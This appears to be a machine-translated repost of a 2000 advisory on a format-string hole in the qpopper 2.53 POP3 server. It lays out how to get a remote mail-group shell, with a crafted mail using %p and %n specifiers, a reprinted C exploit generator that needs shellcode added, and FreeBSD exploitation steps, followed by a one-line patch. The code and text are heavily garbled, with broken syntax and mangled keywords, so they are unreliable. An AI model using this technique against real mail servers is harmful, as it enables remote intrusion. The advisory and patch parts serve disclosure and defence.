[Practical] Get the shell by qpopper2.53 remote

xiaoxiao2021-03-06  28

Get the shell by qpopper2.53 remote

Creation time: 2000-05-27

Article attribute: original

Article submission:


Get the shell by qpopper2.53 remote


Reference: Bufferoverflow SECRURITY ADVISORY # 5 by prizm


Qpopper is a relatively broad POP3 server that allows users to read their letters through POP3 clients.

It is usually used in the standard Unix system.

* Problem

In the version of QPopper 2.53, QPOP's vulnerability will make you remotely get a gid = mail's shell.

The problem is in the POP_MSG () function, when the user performs the EUIDL command, let us check QPOP

2.53 code:

-> Pop_UIDL.C, at the 150th line of code:


Sprintf (Buffer, "% D% S", MSG_ID, MP-> UIDL_STR);

IF (nl = index (buffer, newline) * nl = 0;

Sprintf (Buffer, "% S% D% .128S", Buffer, MP-> Length, from_HDR (P, MP));

RETURN (POP_MSG (p, pop_success, buffer);



The function POP_MSG () defined in pop_msg.c () is: POP_MSG (POP * P, INT Stat,

Const char * format, ...), here has a user entered Format :)

Ok, we imagine the following situation:

Mail from:

200 OK


200 OK


200 OKEY, OKEY. End with "."


X-UIDL: Aaaaaaaaaaaaaaaaaa

From:% P% P% P% P% P% P% P



200 Blablabla OK, Message Accepted for Delivery.

The user Luser then connects to his POP account and runs the EUIDL command:

OK QPOP (Version 2.53) AT B0F Starting. <666.666@b0f>

User Luser

OK Password Required for Luser.

Pass Secret

OK Luser Has 3 Messages (1644 OCTES).


OK 2 Aaaaaaaaaaaaaaaaa 530 0xBFBFC9B00X804FD740XBFBFC9B00X2120X8052E5E0XBFBFD1E80X8057028

Yeah, Thats from My Box with freebsd. As you can see, OUR% P% P% P% P% P% P% P

WHERE IMPLEMENTED AS ARGUMENTS for vsnprintf () Command.

* Utilization

Can you do it? Yes, of course!

But there is a small restriction. QPopper 2.53 will be more difficult to use than Linux, because

FreeBSD changes the vsprintf () call in the pop_msg.c function to vsnprintf () call, there is a significant difference between the two - of course also available :)



/ * QPOP_EUIDL.C EXPLOIT BY Prizm / Buffer0verflow Security


* Sample Exploit for buffer overflow in qpopper 2.53.

* This Little Proggie Generates a mail u Need to send.


* Standard DiscLaimer Applies.

* By The Way, Exploit Is Broken =) You NEED TO INSERT Shellcode.


* Mad Greets to TF8 for Pointing Out the bug, and all Other b0f members.

* Greets to ussrlabs and adm

* Check

http://b0f.freebsd.lublin.pl/ for news.

* /



Char shellcode [] = "imp";

Int main (int Argc, char * argv [])



Unsigned long ra = 0;

IF (argc! = 2) {

FPRINTF (stderr, "usage:% s return_addr / n", argv [0]);

exit (0);


SSCANF (Argv [1], "% X", & ras

IF (! ra)


IF (SizeOf (shellcode) <12 || sizeof (shellcode)> 76) {

FPRINTF (stderr, "bad shellcode / n");

exit (0);


FPRINTF (stderr, "return address: 0x% .8x / n", ra);

Printf ("X-UIDL:");

For (i = 0; i

Printf ("% C", shellcode [i]);

Printf ("/ r / n");

Printf ("from:% s", "% .1000d");

For (i = 0; i <50; i )

Printf ("% C% C% C% C", (Ra & 0xFF), (Ra & 0xFF00) >> 8, (Ra & 0xFF0000) >> 16, (Ra & 0xFF000000) >> 24);

Printf ("@ TEST / R / N");

Printf ("Subject: Test / R / N / R / NhuH? / R / N./R/N");

Return 0;


Use QPOP ports on FreeBSD


This is not too easy, because the function vsprintf () has been replaced by vsnprintf (), so we can't cause overflow, but we

Can still control it - remember% N? Its principle is as follows:

There is a tips using% N this. Take a look at the following code, can you understand why the result of its output is 2000,

Instead of SizeOf (B):

--- ---

#include int main (void) {

INT S = 1; char b [1024]; int in;

Snprintf (B, SizeOf (b), "%. 200D% N", 1, & Q);

RETURN PRINTF ("% D, OVERFLOWED?% S / N", Q, (s == 1? "no": "yes"));


--- ---

I got the following results on my FreeBSD 3.4 machine:


Hey, I just started to see 1024, but you know - Sometimes the operation of the program is not easy to control, see below

Perhaps some help.

Exploiting IT:

a) Find out the exact location of the user's input in the stack.

b) Compose a Message with Filed X-UIDL AND FROM:


From: %. Returnd% N @ TEST

among them:

"PP" is used to populate (two to three bytes)

"Reta" means the address of the returned shellcode

"Shellcode" guess

"Return" Returns Address

c) If you need a FreeBSD version of the utilization program - your own hand :)

* There are vulnerabilities

2.53 (other? Uncertain ...)

* Patch

You can

Http://www.eudora.com/freeware/qpop.html#current Download version to qpopper 3.1

This problem has been resolved.

Or you can modify the code yourself:

In the 150 lines and 62 lines of POP_MSG.C,

- RETURN (POP_MSG (P, Pop_suCcess, Buffer);

change into:

RETURN (POP_MSG (P, Pop_suCcess, "% s", buffer);


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